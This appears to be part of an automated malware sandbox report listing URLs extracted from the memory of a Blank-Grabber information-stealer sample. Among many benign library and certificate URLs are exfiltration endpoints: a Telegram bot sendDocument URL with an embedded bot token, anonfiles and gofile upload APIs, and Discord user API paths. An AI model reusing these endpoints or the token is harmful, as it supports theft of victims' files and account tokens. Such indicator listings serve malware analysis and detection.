                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: powershell.exe, 00000033.00000002.1942613111.000001F226496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                      Source: sB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC52C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                      Source: powershell.exe, 0000000D.00000002.1951924789.000002462EA91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F224E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                      Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                      Source: sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 0000000F.00000002.4216648760.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, word.exe.15.drString found in binary or memory: https://api.telegram.org/bot
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocument
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                      Source: powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                      Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761007997.000001D37211C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189456125.00000281ABB20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABA73000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                      Source: sB2ClgrGng.exe, 00000001.00000003.1769395592.00000281AB9CC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1768908120.00000281AB9BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                      Source: sB2ClgrGng.exe, 00000001.00000003.1767726197.00000281AB66C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1767703223.00000281AB92A000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://docs.python.org/3/howto/mro.html.
                      Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB4E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                      Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                      Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                      Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                      Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB4E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                      Source: sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                      Source: sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                      Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                      Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                      Source: sB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F0A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189456125.00000281ABB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
                      Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
                      Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberr
                      Source: sB2ClgrGng.exe, 00000001.00000003.1781689076.00000281ABAAD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1780927309.00000281AC123000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1781524596.00000281ABAAB000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1781240477.00000281ABA5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                      Source: powershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: sB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                      Source: sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB4E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                      Source: sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                      Source: sB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824376723.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2032780608.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894030317.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1783520888.00000281ABEF8000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                      Source: sB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                      Source: sB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                      Source: sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA5E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                      Source: sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                      Source: sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.mic
                      Source: powershell.exe, 00000033.00000002.1942613111.000001F226052000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB619000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                      Source: sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB5E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                      Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                      Source: sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894030317.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784568761.00000281AB95E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281AB920000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                      Source: sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC538000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: sB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC51C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                      Source: powershell.exe, 0000000D.00000002.2036783032.000002463EB07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F2267FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F234F0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 00000020.00000003.1849613191.000002224F072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: powershell.exe, 00000033.00000002.1942613111.000001F226496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                      Source: powershell.exe, 00000033.00000002.1942613111.000001F226496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                      Source: sB2ClgrGng.exe, 00000001.00000003.1781323039.00000281AB969000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769284741.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769626278.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1777343894.00000281AB962000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769914240.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189456125.00000281ABB20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1770763715.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                      Source: sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
                      Source: sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp_U
